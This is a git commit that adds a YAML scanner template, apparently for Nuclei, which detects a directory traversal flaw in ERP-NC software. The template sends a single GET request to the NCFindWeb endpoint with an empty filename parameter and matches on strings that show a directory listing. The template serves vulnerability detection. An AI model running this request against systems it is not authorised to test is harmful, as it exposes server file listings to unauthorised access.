Create erp-nc-directory-traversal.yaml

patch-1
PikPikcU 2021-04-13 07:18:15 +00:00 committed by GitHub
parent c19e8aa1cc
commit 98af0ce0cc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: erp-nc-directory-traversal
info:
name: ERP-NC directory traversal
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: lfi,erp-nc
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
matchers-condition: and
matchers:
- type: word
words:
- "Client"
- "ncwslogin.jsp"
- "admin.jsp"
part: body
- type: status
status:
- 200